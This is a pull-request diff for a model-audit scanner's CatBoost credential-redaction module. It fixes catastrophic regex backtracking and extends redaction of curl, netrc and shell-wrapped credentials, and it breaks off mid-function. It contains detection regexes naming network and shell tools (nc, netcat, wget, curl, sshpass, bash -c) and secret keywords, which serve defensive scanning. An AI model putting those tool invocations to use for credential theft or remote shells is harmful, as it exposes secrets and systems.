### PR TITLE
fix: prevent CatBoost credential-redaction ReDoS

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Bug Fixes
 
+- avoid exponential backtracking while redacting command-substitution credentials
 - bound Joblib decompression output to the configured scanner read budget
 - close JIT replay alias, probe-budget, and compound-clause context gaps without suppressing dangerous browser or native-library calls
 - reject cleartext HTTP cloud storage and PyTorch Hub model sources

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,7 +9,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Bug Fixes
 
-- avoid exponential backtracking while redacting command-substitution credentials
+- bound CatBoost command-evidence redaction work and cover distant, shell-concatenated, wrapped, and netrc curl credentials
 - report TAR external link escapes with the dedicated symlink rule code, resolve link targets from their correct archive bases, and avoid retaining passing checks for benign link floods
 - bind direct sharded-model cache entries to sibling shard and selected model configuration content fingerprints, and strengthen cache configuration hashes
 - fail closed on PMML XML parsing when defusedxml is unavailable instead of using the stdlib parser

--- a/modelaudit/scanners/_catboost_evidence_redaction.py
+++ b/modelaudit/scanners/_catboost_evidence_redaction.py
@@ -282,7 +282,7 @@ COMMAND_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_SUBSTITUTION_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?P<option>(?:(?<!\w)--(?:user|proxy-user)|(?<!\w)-[a-z]*u)(?:=|\s+)?)"
-    r"(?P<username>[^:\s\"';&|]*:)(?P<password>\$\((?:\\.|[^)])*\))"
+    r"(?P<username>[^:\s\"';&|]*:)(?P<password>\$\((?:\\.|[^\\)])*\))"
 )
 COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(?<![?&/\w-])(?P<option>(?:proxy-)?user\s*(?:=|:|\s+)\s*)"

--- a/modelaudit/scanners/_catboost_evidence_redaction.py
+++ b/modelaudit/scanners/_catboost_evidence_redaction.py
@@ -28,12 +28,30 @@ EVIDENCE_REDACTION_LOOKAHEAD_CHARS: Final[int] = 4096
 EVIDENCE_URL_LOOKAHEAD_CHARS: Final[int] = 64 * 1024
 CURL_COMMAND_SCAN_CHARS: Final[int] = EVIDENCE_URL_LOOKAHEAD_CHARS
 MAX_CURL_EXECUTABLE_CANDIDATES: Final[int] = 64
+MAX_SUBPROCESS_CALL_CANDIDATES: Final[int] = 64
 MAX_URL_QUERY_DECODE_PASSES: Final[int] = 8
 MAX_NESTED_URL_QUERY_DEPTH: Final[int] = 8
 MAX_EVALUATED_KEY_CHARS: Final[int] = 256
 MAX_KEY_EXPRESSION_CHARS: Final[int] = 300
 MAX_KEY_EXPRESSION_PARSE_ATTEMPTS: Final[int] = 64
 MAX_KEY_EXPRESSION_CANDIDATES: Final[int] = 8
+SENSITIVE_KEYWORD_SIGNALS: Final[tuple[str, ...]] = (
+    "access",
+    "api",
+    "auth",
+    "cookie",
+    "credential",
+    "jwt",
+    "pass",
+    "private",
+    "pwd",
+    "sas",
+    "secret",
+    "session",
+    "sig",
+    "storage",
+    "token",
+)
 DICT_LOOKUP_MISSING: Final[object] = object()
 DICT_LOOKUP_UNKNOWN: Final[object] = object()
 NONE_COMPARABLE: Final[object] = object()
@@ -199,14 +217,15 @@ SENSITIVE_EVIDENCE_PREFIX_RE: Final[re.Pattern[str]] = re.compile(
     rf"\b{AUTHORIZATION_KEY_PATTERN}\s*{ASSIGNMENT_SEPARATOR}\s*{AUTHORIZATION_SCHEME_PATTERN}|\bbearer\s+)"
 )
 CURL_EXECUTABLE_NAME_PATTERN: Final[str] = r"curl(?:\.exe)?"
+SHELL_COMMAND_EXECUTABLE_PATTERN: Final[str] = r"(?:bash|csh|dash|fish|ksh|mksh|sh|tcsh|zsh)"
 COMMAND_EVIDENCE_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)\b(?:(?:os\.system|subprocess\.(?:popen|run|call|check_output|check_call)|eval|exec|__import__)\s*\(|"
-    r"(?:bash|sh)\s+-c\b|cmd\.exe\s*/c\b|powershell(?:\.exe)?\b|"
+    rf"{SHELL_COMMAND_EXECUTABLE_PATTERN}\s+-c\b|cmd\.exe\s*/c\b|powershell(?:\.exe)?\b|"
     rf"(?:{CURL_EXECUTABLE_NAME_PATTERN}|wget|nc|netcat|sshpass|redis-cli)(?=\s|$))"
     r"|(?:docker\s+login|aws\s+configure\s+set|az\s+(?:login|storage)|openssl\s+enc|poetry\s+config)\b"
 )
 COMMAND_CONTEXT_LITERAL_RE: Final[re.Pattern[str]] = re.compile(
-    rf"(?i)(?:os\.system|subprocess|__import__|bash\s+-c|sh\s+-c|cmd\.exe|powershell|"
+    rf"(?i)(?:os\.system|subprocess|__import__|{SHELL_COMMAND_EXECUTABLE_PATTERN}\s+-c|cmd\.exe|powershell|"
     rf"{CURL_EXECUTABLE_NAME_PATTERN}|wget|nc\s+|netcat|"
     r"sshpass|redis-cli|docker\s+login|aws\s+configure\s+set|az\s+(?:login|storage)|openssl\s+enc|"
     r"poetry\s+config|\b(?:cat|id|touch)\b|/[A-Za-z0-9_./-]+)"
@@ -236,7 +255,8 @@ COMMAND_SECRET_OPTION_RE: Final[re.Pattern[str]] = re.compile(
     r"(?!<\()(?:\$?\"(?:\\.|[^\"\\])*\"|\$?'(?:\\.|[^'\\])*'|[^\s\"';&|)]+)"
 )
 CURL_COMMAND_TRANSITION_PATTERN: Final[str] = (
-    rf"(?<![-/\w.])(?:bash|sh|cmd\.exe|powershell(?:\.exe)?|wget|nc|netcat|sshpass|redis-cli|docker|aws|"
+    rf"(?<![-/\w.])(?:{SHELL_COMMAND_EXECUTABLE_PATTERN}|cmd\.exe|powershell(?:\.exe)?|wget|nc|netcat|"
+    rf"sshpass|redis-cli|docker|aws|"
     rf"{CURL_EXECUTABLE_NAME_PATTERN})"
     r"(?=\s+-)"
 )
@@ -277,7 +297,9 @@ COMMAND_CERT_OPTION_ESCAPE_PATTERN: Final[str] = r"(?:\\)?"
 CURL_CERT_BUNDLE_FLAG_PATTERN: Final[str] = r"[#012346:BGIJLMNORSVZafgijklnpqsv]*"
 CURL_CONFIG_SHORT_OPTION_PATTERN: Final[str] = rf"-(?-i:{CURL_CERT_BUNDLE_FLAG_PATTERN}K)"
 CURL_USER_SHORT_OPTION_PATTERN: Final[str] = rf"-(?-i:{CURL_CERT_BUNDLE_FLAG_PATTERN}u)"
-COMMAND_USER_OPTION_PATTERN: Final[str] = rf"(?:(?<!\w)--(?:user|proxy-user)|(?<!\w){CURL_USER_SHORT_OPTION_PATTERN})"
+COMMAND_USER_OPTION_PATTERN: Final[str] = (
+    rf"(?:(?<![-\w])--(?:user|proxy-user)(?![\w-])|(?<![-\w]){CURL_USER_SHORT_OPTION_PATTERN})"
+)
 COMMAND_CERT_OPTION_PATTERN: Final[str] = (
     rf"(?:{COMMAND_CERT_OPTION_BOUNDARY_PATTERN}{COMMAND_CERT_OPTION_ESCAPE_PATTERN}"
     rf"--(?:proxy-)?cert(?:=|\s+)|{COMMAND_CERT_OPTION_BOUNDARY_PATTERN}{COMMAND_CERT_OPTION_ESCAPE_PATTERN}"
@@ -315,31 +337,39 @@ COMMAND_CERT_SHELL_WORD_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?P<option>{COMMAND_CERT_OPTION_PATTERN})"
     r"(?P<argument>(?:\\[\s\S]|[^\s;&|)])+)"
 )
+COMMAND_SEPARATELY_QUOTED_USER_SHELL_WORD_RE: Final[re.Pattern[str]] = re.compile(
+    rf"(?is)(?P<option>(?P<option_quote>[\"'])(?:--(?:user|proxy-user)|{CURL_USER_SHORT_OPTION_PATTERN})"
+    r"(?P=option_quote)\s+)"
+    r"(?P<argument>(?:\\[\s\S]|[^\s;&|)])+)"
+)
+COMMAND_SEPARATELY_QUOTED_CERT_SHELL_WORD_RE: Final[re.Pattern[str]] = re.compile(
+    rf"(?is)(?P<option>(?P<option_quote>[\"'])(?:--(?:proxy-)?cert|-(?-i:{CURL_CERT_BUNDLE_FLAG_PATTERN}E))"
+    r"(?P=option_quote)\s+)"
+    r"(?P<argument>(?:\\[\s\S]|[^\s;&|)])+)"
+)
 COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?is)(?<![?&/\w-])(?P<option>(?:proxy-)?user\s*(?:=|:|\s+)\s*)"
+    r"(?is)(?<![?&/\w-])(?P<option>(?:--)?(?:proxy-)?user\s*(?:=|:|\s+)\s*)"
     rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<username>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
     rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P<closing>(?P=quote)|\Z)"
 )
 COMMAND_CONFIG_USER_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?i)(?<![?&/\w-])((?:proxy-)?user\s*(?:=|:|\s+)\s*)(\$?[\"']?)([^:\s\"';&|]*:)"
+    r"(?i)(?<![?&/\w-])((?:--)?(?:proxy-)?user\s*(?:=|:|\s+)\s*)(\$?[\"']?)([^:\s\"';&|]*:)"
     r"([^\"'\r\n]+)([\"']?)"
 )
-CURL_INLINE_CONFIG_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
-    rf"(?is)\b{CURL_EXECUTABLE_NAME_PATTERN}\b"
-    rf"(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,{CURL_COMMAND_SCAN_CHARS}}}?"
-    rf"(?P<option>(?<!\w)(?:(?P<config>--config)(?:=|\s+)|"
+CURL_CONFIG_SOURCE_OPTION_RE: Final[re.Pattern[str]] = re.compile(
+    rf"(?is)(?P<option>(?<!\w)(?:(?P<config>--config)(?:=|\s+)|"
     rf"(?P<short_config>{CURL_CONFIG_SHORT_OPTION_PATTERN})\s*|"
     r"(?P<netrc>--netrc-file)(?:=|\s+)))"
     r"(?P<source><\(|-)"
 )
 COMMAND_CONFIG_CERT_PASSWORD_QUOTED_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?is)(?P<option>(?<![?&/\w-])(?:proxy-)?cert\s*(?:=|:|\s+)\s*)"
+    r"(?is)(?P<option>(?<![?&/\w-])(?:--)?(?:proxy-)?cert\s*(?:=|:|\s+)\s*)"
     rf"(?P<prefix>\$?)(?P<quote>[\"'])(?P<certificate>{COMMAND_QUOTED_CREDENTIAL_NAME_CHAR_PATTERN}*:)"
     rf"(?P<password>{COMMAND_QUOTED_CREDENTIAL_CHAR_PATTERN}+)(?P<closing>(?P=quote)|\Z)"
 )
 COMMAND_CONFIG_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN: Final[str] = r"(?:\\.|(?!\\)(?!:)[^\s\"';&|)])"
 COMMAND_CONFIG_CERT_PASSWORD_RE: Final[re.Pattern[str]] = re.compile(
-    r"(?i)(?P<option>(?<![?&/\w-])(?:proxy-)?cert\s*(?:=|:|\s+)\s*)"
+    r"(?i)(?P<option>(?<![?&/\w-])(?:--)?(?:proxy-)?cert\s*(?:=|:|\s+)\s*)"
     rf"(?P<certificate>{COMMAND_CONFIG_UNQUOTED_CERTIFICATE_NAME_CHAR_PATTERN}*:)"
     rf"(?P<password>{COMMAND_UNQUOTED_CREDENTIAL_PASSWORD_PATTERN})"
 )
@@ -418,6 +448,9 @@ COMMAND_INLINE_SECRET_SOURCE_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?:(?![;&|\n]|{CURL_COMMAND_TRANSITION_PATTERN}(?=\s|$)).){{0,{CURL_COMMAND_SCAN_CHARS}}}?"
     r"(?<!\w)-[A-Za-z]*b(?![A-Za-z])(?:=|\s+))\s*<\("
 )
+CURL_INLINE_COOKIE_SOURCE_OPTION_RE: Final[re.Pattern[str]] = re.compile(
+    r"(?is)(?<!\w)-[A-Za-z]*b(?![A-Za-z])(?:=|\s+)\s*<\("
+)
 SHELL_HERE_STRING_VALUE_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)<<<\s*(?P<value>{COMMAND_POSITIONAL_SECRET_VALUE})"
 )
@@ -467,7 +500,7 @@ SENSITIVE_ARGV_PAIR_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?P<prefix>(?P<collection_prefix>[\[(,])\s*(?:{PYTHON_STRING_PREFIX_RE})?(?P<key_quote>[\"'])"
     rf"(?P<key>{QUOTED_KEY_CONTENT_PATTERN})(?P=key_quote)\s*,\s*)"
     rf"(?P<value_prefix>{PYTHON_STRING_PREFIX_RE})(?P<value_quote>[\"'])"
-    rf"(?P<value>(?:\\.|(?!(?P=value_quote))[\s\S]){{0,{EVIDENCE_REDACTION_LOOKAHEAD_CHARS}}})"
+    rf"(?P<value>(?:\\.|(?!\\)(?!(?P=value_quote))[\s\S]){{0,{EVIDENCE_REDACTION_LOOKAHEAD_CHARS}}})"
     rf"(?P=value_quote)"
 )
 CURL_SHORT_COOKIE_OPTION_RE: Final[re.Pattern[str]] = re.compile(r"(?i)^-[a-z]*b$")
@@ -477,6 +510,14 @@ PYTHON_CURL_ARGV_START_RE: Final[re.Pattern[str]] = re.compile(
 )
 CURL_EXECUTABLE_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?i)(?<![-\w.])(?P<executable>{CURL_EXECUTABLE_NAME_PATTERN})(?=$|[\s\"',)\]])"
+)
+CURL_SCAN_PREFIX_RE: Final[re.Pattern[str]] = re.compile(rf"(?i)\b{CURL_EXECUTABLE_NAME_PATTERN}\b")
+CURL_STATIC_SHELL_EXECUTABLE_RE: Final[re.Pattern[str]] = re.compile(
+    r"(?i)(?<![-\w.])(?P<executable>"
+    r"(?=[^\s;&|(),\[\]{}]*[\"'\\])"
+    r"[\"'\\]*c[\"'\\]*u[\"'\\]*r[\"'\\]*l"
+    r"(?:[\"'\\]*\.[\"'\\]*e[\"'\\]*x[\"'\\]*e)?[\"'\\]*)"
+    r"(?=$|[\s\"',)\]])"
 )
 SERIALIZED_STRUCTURED_QUOTED_KEY_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)(?P<prefix>(?:^|[{{,])\s*)(?P<slashes>\\+)(?P<quote>[\"'])"
@@ -499,11 +540,15 @@ COMMAND_SENSITIVE_HEADER_VALUE_RE: Final[re.Pattern[str]] = re.compile(
 )
 COMMAND_QUOTED_COOKIE_HEADER_VALUE_RE: Final[re.Pattern[str]] = re.compile(
     r"(?is)(\$?(?P<cookie_quote>[\"'])cookie\s*:\s*)"
-    r"(?:\\.|(?!(?P=cookie_quote)).)*(?P=cookie_quote)"
+    r"(?:\\.|(?!\\)(?!(?P=cookie_quote)).)*(?P=cookie_quote)"
 )
 COMMAND_STRUCTURED_SENSITIVE_VALUE_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?is)((?P<key_quote>[\"'])(?:{SENSITIVE_ASSIGNMENT_KEY}|{AUTHORIZATION_KEY_PATTERN})"
-    rf"(?P=key_quote)\s*:\s*)(?P<value_quote>[\"'])(?:\\.|(?!(?P=value_quote)).)*(?P=value_quote)"
+    rf"(?P=key_quote)\s*:\s*)(?P<value_quote>[\"'])(?:\\.|(?!\\)(?!(?P=value_quote)).)*(?P=value_quote)"
+)
+EMBEDDED_CONTROL_QUOTED_KEY_RE: Final[re.Pattern[str]] = re.compile(
+    rf"(?is)(?P<quote>[\"'])(?P<key>(?:\\.|(?!\\)(?!(?P=quote))[\s\S]){{1,128}})(?P=quote)"
+    rf"(?P<separator>\s*{ASSIGNMENT_SEPARATOR}\s*)"
 )
 STRUCTURED_SENSITIVE_KEY_RE: Final[re.Pattern[str]] = re.compile(
     rf"(?i)(?:^|[{{,])\s*[\"'](?:{SENSITIVE_ASSIGNMENT_KEY}|{AUTHORIZATION_KEY_PATTERN})[\"']\s*:"
@@ -876,11 +921,6 @@ def _normalize_embedded_control_sensitive_keys(text: str) -> str:
             return None
         return _normalize_sensitive_key(normalized)
 
-    quoted_pattern = re.compile(
-        rf"(?is)(?P<quote>[\"'])(?P<key>(?:\\.|(?!(?P=quote))[\s\S]){{1,128}})(?P=quote)"
-        rf"(?P<separator>\s*{ASSIGNMENT_SEPARATOR}\s*)"
-    )
-
     def replace_quoted(match: re.Match[str]) -> str:
         normalized = normalize_key(match.group("key"))
         if normalized is None:
@@ -888,7 +928,7 @@ def _normalize_embedded_control_sensitive_keys(text: str) -> str:
         quote = match.group("quote")
         return f"{quote}{normalized}{quote}{match.group('separator')}"
 
-    text = quoted_pattern.sub(replace_quoted, text)
+    text = EMBEDDED_CONTROL_QUOTED_KEY_RE.sub(replace_quoted, text)
     unquoted_pattern = re.compile(
         rf"(?is)(?<![\w.-])(?P<key>[^\s\"'=:;,\[\](){{}}]{{1,128}})"
         rf"(?P<separator>\s*{ASSIGNMENT_SEPARATOR}\s*)"
@@ -1029,6 +1069,9 @@ def _normalize_serialized_structured_sensitive_keys(text: str) -> str:
 
 
 def _normalize_unquoted_sensitive_keys(text: str) -> str:
+    if "=" not in text and ":" not in text:
+        return text
+
     def replace_key(match: re.Match[str]) -> str:
         decoded_key = _decode_key_escapes(match.group(1))
         normalized_key = _normalize_sensitive_key(decoded_key)
@@ -2284,6 +2327,11 @@ def _count_preceding_backslashes(text: str, position: int) -> int:
 
 
 def _redact_sensitive_literal_expressions(text: str) -> str:
+    folded = text.casefold()
+    if not any(signal in folded for signal in SENSITIVE_KEYWORD_SIGNALS) and "bearer" not in folded:
+        return text
+    if "=" not in text and ":" not in text and "bearer" not in folded:
+        return text
     matches = list(SENSITIVE_EVIDENCE_PREFIX_RE.finditer(text))
     if not matches:
         return text
@@ -2318,6 +2366,11 @@ def _redact_sensitive_literal_expressions(text: str) -> str:
 
 
 def _redact_unclosed_quoted_values(text: str) -> str:
+    folded = text.casefold()
+    if not any(signal in folded for signal in SENSITIVE_KEYWORD_SIGNALS) and "bearer" not in folded:
+        return text
+    if ('"' not in text and "'" not in text) or ("=" not in text and ":" not in text and "bearer" not in folded):
+        return text
     starts: list[tuple[int, str]] = []
     for pattern, slash_group, quote_group in (
         (TRIPLE_QUOTED_SENSITIVE_ASSIGNMENT_START_RE, 3, 4),
@@ -2347,6 +2400,11 @@ def _redact_unclosed_quoted_values(text: str) -> str:
 
 
 def _redact_adjacent_string_literals(text: str) -> str:
+    folded = text.casefold()
+    if not any(signal in folded for signal in SENSITIVE_KEYWORD_SIGNALS) and "bearer" not in folded:
+        return text
+    if ('"' not in text and "'" not in text) or ("=" not in text and ":" not in text and "bearer" not in folded):
+        return text
     for pattern in (
         ADJACENT_LITERAL_SENSITIVE_ASSIGNMENT_RE,
         ADJACENT_LITERAL_AUTHORIZATION_RE,
@@ -2357,6 +2415,9 @@ def _redact_adjacent_string_literals(text: str) -> str:
 
 
 def _redact_residual_expression_literals(text: str) -> str:
+    if REDACTED_EVIDENCE_VALUE not in text or ('"' not in text and "'" not in text):
+        return text
+
     def replace_residual(match: re.Match[str]) -> str:
         value = match.group(0)[len(match.group(1)) :]
         if REDACTED_STRUCTURED_VALUE_PREFIX_RE.match(value) or REDACTED_VALUE_PREFIX_RE.match(value):
@@ -2420,6 +2481,12 @@ def _redact_command_user_password(match: re.Match[str]) -> str:
 
 
 def _redact_quoted_command_user_password(match: re.Match[str]) -> str:
+    if (
+        match.start("quote") == match.end("option")
+        and match.start() > 0
+        and match.string[match.start() - 1] == match.group("quote")
+    ):
+        return match.group(0)
     return (
         f"{match.group('option')}{match.group('prefix')}{match.group('quote')}"
         f"{match.group('username')}{REDACTED_EVIDENCE_VALUE}{match.group('closing')}"
@@ -2666,14 +2733,32 @@ def _redact_openssl_password_source(match: re.Match[str]) -> str:
     return _redact_command_positional_secret(match)
 
 
-def _redact_inline_command_secret_sources(text: str) -> str:
-    for match in reversed(list(COMMAND_INLINE_SECRET_SOURCE_RE.finditer(text))):
-        source_end = _find_shell_group_end(text, match.end())
-        source = text[match.end() : source_end]
+def _redact_process_substitution_sources(text: str, source_starts: set[int]) -> str:
+    for source_start in sorted(source_starts, reverse=True):
+        source_end = _find_shell_group_end(text, source_start)
+        source = text[source_start:source_end]
         redacted_source = _redact_inline_secret_source(source)
         if redacted_source != source:
-            text = f"{text[: match.end()]}{redacted_source}{text[source_end:]}"
+            text = f"{text[:source_start]}{redacted_source}{text[source_end:]}"
     return text
+
+
+def _redact_inline_curl_cookie_sources(text: str) -> str:
+    source_starts: set[int] = set()
+    for command_start, command_end in _curl_command_ranges(text):
+        source_starts.update(
+            match.end() for match in CURL_INLINE_COOKIE_SOURCE_OPTION_RE.finditer(text, command_start, command_end)
+        )
+    return _redact_process_substitution_sources(text, source_starts)
+
+
+def _redact_inline_command_secret_sources(text: str) -> str:
+    source_starts = {match.end() for match in COMMAND_INLINE_SECRET_SOURCE_RE.finditer(text)}
+    for command_start, command_end in _curl_command_ranges(text):
+        source_starts.update(
+            match.end() for match in CURL_INLINE_COOKIE_SOURCE_OPTION_RE.finditer(text, command_start, command_end)
+        )
+    return _redact_process_substitution_sources(text, source_starts)
 
 
 def _curl_executable_token_start(text: str, curl_name_start: int) -> int | None:
@@ -2684,6 +2769,22 @@ def _curl_executable_token_start(text: str, curl_name_start: int) -> int | None:
     if "://" in candidate or candidate.startswith("//") or re.match(r"[A-Za-z_][A-Za-z0-9_]*=", candidate) is not None:
         return None
     return token_start if candidate.endswith(("/", "\\")) else curl_name_start
+
+
+def _curl_executable_spans(text: str) -> list[tuple[int, int]]:
+    spans = [(match.start(), match.end()) for match in CURL_EXECUTABLE_RE.finditer(text)]
+    for match in CURL_STATIC_SHELL_EXECUTABLE_RE.finditer(text):
+        raw_executable = match.group("executable")
+        if CURL_EXECUTABLE_RE.search(raw_executable) is not None:
+            continue
+        try:
+            decoded = shlex.split(raw_executable)
+        except ValueError:
+            continue
+        if len(decoded) != 1 or re.fullmatch(CURL_EXECUTABLE_NAME_PATTERN, decoded[0], re.IGNORECASE) is None:
+            continue
+        spans.append((match.start(), match.end()))
+    return sorted(spans)
 
 
 def _shell_segment_context(text: str, end: int) -> tuple[int, str | None, int]:
@@ -2781,6 +2882,14 @@ def _shell_wrapper_prefix_allows_command(prefix: str) -> bool:
             while index < len(tokens) and tokens[index].startswith("-"):
                 index += 1
             continue
+        if wrapper == "busybox":
+            return index == len(tokens)
+        if wrapper == "setsid":
+            while index < len(tokens) and tokens[index].startswith("-"):
+                if tokens[index] not in {"-c", "-f", "-w", "--ctty", "--fork", "--wait"}:
+                    return False
+                index += 1
+            continue
         if wrapper in {"exec", "time"}:
             options_with_values = {"-a"} if wrapper == "exec" else {"-f", "-o", "--format", "--output"}
             while index < len(tokens) and tokens[index].startswith("-"):
@@ -2854,7 +2963,8 @@ def _curl_executable_is_command(text: str, executable_start: int) -> bool:
             return True
         return (
             re.search(
-                r"(?is)(?:\b(?:bash|sh)\s+-c|\bcmd(?:\.exe)?\s+/c|\bpowershell(?:\.exe)?\s+-c)$",
+                rf"(?is)(?:\b{SHELL_COMMAND_EXECUTABLE_PATTERN}\s+-c|\bcmd(?:\.exe)?\s+/c|"
+                r"\bpowershell(?:\.exe)?\s+-c)$",
                 before_quote,
             )
             is not None
@@ -2864,7 +2974,8 @@ def _curl_executable_is_command(text: str, executable_start: int) -> bool:
     if not prefix:
         return True
     if re.fullmatch(
-        r"(?is)(?:\b(?:bash|sh)\s+-c|\bcmd(?:\.exe)?\s+/c|\bpowershell(?:\.exe)?\s+-c)",
+        rf"(?is)(?:\b{SHELL_COMMAND_EXECUTABLE_PATTERN}\s+-c|\bcmd(?:\.exe)?\s+/c|"
+        r"\bpowershell(?:\.exe)?\s+-c)",
         prefix,
     ):
         return True
@@ -2876,17 +2987,17 @@ def _curl_executable_is_command(text: str, executable_start: int) -> bool:
 def _curl_command_ranges(text: str) -> list[tuple[int, int]]:
     ranges: list[tuple[int, int]] = []
     covered_until = -1
-    for match in CURL_EXECUTABLE_RE.finditer(text):
-        if match.start() < covered_until:
+    for candidate_start, candidate_end in _curl_executable_spans(text):
+        if candidate_start < covered_until:
             continue
-        executable_start = _curl_executable_token_start(text, match.start())
+        executable_start = _curl_executable_token_start(text, candidate_start)
         if executable_start is None or not _curl_executable_is_command(text, executable_start):
             continue
         _, enclosing_quote, _ = _shell_segment_context(text, executable_start)
         segment_end = len(text)
         quote = enclosing_quote if enclosing_quote in {"'", '"'} else None
         bracket_depth = 0
-        index = match.end()
+        index = candidate_end
         while index < len(text):
             char = text[index]
             if quote is not None:
@@ -2920,8 +3031,23 @@ def _curl_command_ranges(text: str) -> list[tuple[int, int]]:
 
 
 def _curl_candidate_limit_exceeded(text: str) -> bool:
-    for index, _ in enumerate(CURL_EXECUTABLE_RE.finditer(text), start=1):
-        if index > MAX_CURL_EXECUTABLE_CANDIDATES:
+    candidate_count = 0
+    for _ in CURL_SCAN_PREFIX_RE.finditer(text):
+        candidate_count += 1
+        if candidate_count > MAX_CURL_EXECUTABLE_CANDIDATES:
+            return True
+    for start, end in _curl_executable_spans(text):
+        if CURL_SCAN_PREFIX_RE.search(text[start:end]) is not None:
+            continue
+        candidate_count += 1
+        if candidate_count > MAX_CURL_EXECUTABLE_CANDIDATES:
+            return True
+    return False
+
+
+def _subprocess_candidate_limit_exceeded(text: str) -> bool:
+    for index, _ in enumerate(SUBPROCESS_CALL_PREFIX_RE.finditer(text), start=1):
+        if index > MAX_SUBPROCESS_CALL_CANDIDATES:
             return True
     return False
 
@@ -2931,6 +3057,8 @@ def _redact_curl_credentials(text: str) -> str:
         return REDACTED_EVIDENCE_VALUE
     for start, end in reversed(_curl_command_ranges(text)):
         fragment = text[start:end]
+        fragment = COMMAND_SEPARATELY_QUOTED_CERT_SHELL_WORD_RE.sub(_redact_shell_word_credential, fragment)
+        fragment = COMMAND_SEPARATELY_QUOTED_USER_SHELL_WORD_RE.sub(_redact_shell_word_credential, fragment)
         fragment = COMMAND_CERT_PASSWORD_QUOTED_RE.sub(_redact_quoted_certificate_password, fragment)
         fragment = COMMAND_CERT_PASSWORD_RE.sub(_redact_certificate_password, fragment)
         fragment = COMMAND_QUOTED_USER_PASSWORD_RE.sub(_redact_quoted_command_user_password, fragment)
@@ -2988,32 +3116,30 @@ def _find_preceding_shell_pipe(text: str, start: int, end: int) -> tuple[int, in
 def _redact_inline_curl_config_passwords(text: str) -> str:
     """Redact credentials only inside inline curl config and netrc sources."""
     ranges: list[tuple[int, int, bool]] = []
-    for match in CURL_INLINE_CONFIG_SOURCE_RE.finditer(text):
-        executable_start = _curl_executable_token_start(text, match.start())
-        if executable_start is None or not _curl_executable_is_command(text, executable_start):
-            continue
-        is_netrc = match.group("netrc") is not None
-        if match.group("source") == "<(":
-            ranges.append((match.end(), _find_shell_group_end(text, match.end()), is_netrc))
-            continue
+    for command_start, command_end in _curl_command_ranges(text):
+        for match in CURL_CONFIG_SOURCE_OPTION_RE.finditer(text, command_start, command_end):
+            is_netrc = match.group("netrc") is not None
+            if match.group("source") == "<(":
+                ranges.append((match.end(), _find_shell_group_end(text, match.end()), is_netrc))
+                continue
 
-        line_start = text.rfind("\n", 0, match.start()) + 1
-        pipe, input_start = _find_preceding_shell_pipe(text, line_start, match.start())
-        if pipe >= 0:
-            ranges.append((input_start, pipe, is_netrc))
-            piped_heredoc_range = _find_shell_heredoc_body_range(text, input_start)
-            if piped_heredoc_range is not None:
-                ranges.append((*piped_heredoc_range, is_netrc))
+            line_start = text.rfind("\n", 0, command_start) + 1
+            pipe, input_start = _find_preceding_shell_pipe(text, line_start, command_start)
+            if pipe >= 0:
+                ranges.append((input_start, pipe, is_netrc))
+                piped_heredoc_range = _find_shell_heredoc_body_range(text, input_start)
+                if piped_heredoc_range is not None:
+                    ranges.append((*piped_heredoc_range, is_netrc))
 
-        line_end = text.find("\n", match.end())
-        if line_end < 0:
-            line_end = len(text)
-        here_string = _search_unquoted_shell_pattern(SHELL_HERE_STRING_VALUE_RE, text, match.end(), line_end)
-        if here_string is not None:
-            ranges.append((here_string.start("value"), here_string.end("value"), is_netrc))
-        heredoc_range = _find_shell_heredoc_body_range(text, match.end())
-        if heredoc_range is not None:
-            ranges.append((*heredoc_range, is_netrc))
+            line_end = text.find("\n", match.end())
+            if line_end < 0:
+                line_end = len(text)
+            here_string = _search_unquoted_shell_pattern(SHELL_HERE_STRING_VALUE_RE, text, match.end(), line_end)
+            if here_string is not None:
+                ranges.append((here_string.start("value"), here_string.end("value"), is_netrc))
+            heredoc_range = _find_shell_heredoc_body_range(text, match.end())
+            if heredoc_range is not None:
+                ranges.append((*heredoc_range, is_netrc))
 
     for start, end, is_netrc in reversed(ranges):
         fragment = text[start:end]
@@ -3026,6 +3152,12 @@ def _redact_inline_curl_config_passwords(text: str) -> str:
 
 
 def _redact_quoted_certificate_password(match: re.Match[str]) -> str:
+    if (
+        match.start("quote") == match.end("option")
+        and match.start() > 0
+        and match.string[match.start() - 1] == match.group("quote")
+    ):
+        return match.group(0)
     return (
         f"{match.group('option')}{match.group('prefix')}{match.group('quote')}"
         f"{match.group('certificate')}{REDACTED_EVIDENCE_VALUE}{match.group('closing')}"
@@ -3058,6 +3190,13 @@ def _redact_shell_word_credential(match: re.Match[str]) -> str:
     password = argument[colon_index + 1 :]
     if REDACTED_EVIDENCE_VALUE in password:
         return match.group(0)
+    closing_quote = ""
+    if (len(argument) >= 2 and argument[0] in {"'", '"'} and argument[-1] == argument[0]) or (
+        len(argument) >= 3 and argument[0] == "$" and argument[1] in {"'", '"'} and argument[-1] == argument[1]
+    ):
+        closing_quote = argument[-1]
+    if closing_quote:
